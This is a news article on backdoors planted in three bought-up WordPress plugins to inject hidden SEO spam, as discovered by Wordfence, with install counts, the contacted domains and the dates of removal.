The massive size of the WordPress plugins ecosystem is starting to show signs of rot, as yet another incident has been reported involving the sale of old abandoned plugins to new authors who immediately proceed to add a backdoor to the original code.
The WordPress security team has intervened and removed all plugins from the official WordPress Plugins Directory. WordPress security firm Wordfence discovered the three backdoors. Details about the three backdoored plugins are available below.
|Plugin Name||Active Installs||Backdoor Added||Calls to||Removed by WP Team|
|Duplicate Page and Post||50,000+||v2.1.0 (August 2017)||cloud-wp.org||December 14, 2017|
|No Follow All External Links||9,000+||v2.1.0 (April 2017)||cloud.wpserve.org||December 19, 2017|
|WP No External Links||30,000+||v4.2.1 (July 2017)||w pconnect.org||December 22, 2017|
Backdoor tied to the same threat actor
The backdoor code in all three plugins works in a very similar way by calling to a remote server and inserting content and links on the affected sites. Experts believe the backdoor code is used to inject hidden SEO spam (cloaked links) on affected sites that help improve the search engine ranking of other sites.
Wordfence experts believe the same actor is behind all three plugins. They based their conclusion on a series of discoveries they made while analyzing the malicious plugins and how they operated:
ⴲ The same company (Orb Online) paid for the acquisition of the first and second plugins.
ⴲ The purchase solicitation sent via email to the owners of the second and third plugins used a similar template.
ⴲ All plugins were purchased by newly created WordPress.org users.
ⴲ The backdoor code was similar in all three plugins.
This type of incident is becoming common
This is not the first time Wordfence has uncovered a massive operation to buy old WordPress plugins and add a backdoor for injecting SEO spam on websites that were using the affected plugins.
Previously, Wordfence tied the purchase and backdoor code of several plugins to a UK man named Mason Soiza, who Wordfence linked to backdoors in plugins such as Captcha (+300,000 installs), Display Widgets (+200,000 installs), and 404 to 301 (70,000 installs).
Fellow WordPress security firm White Fir Design recently pointed out that these plugins often linger on infected sites for years. For example, three years later, there are still hundreds of (most likely abandoned) WordPress sites running one of 14 plugins that also featured a similar SEO spam-injecting backdoor.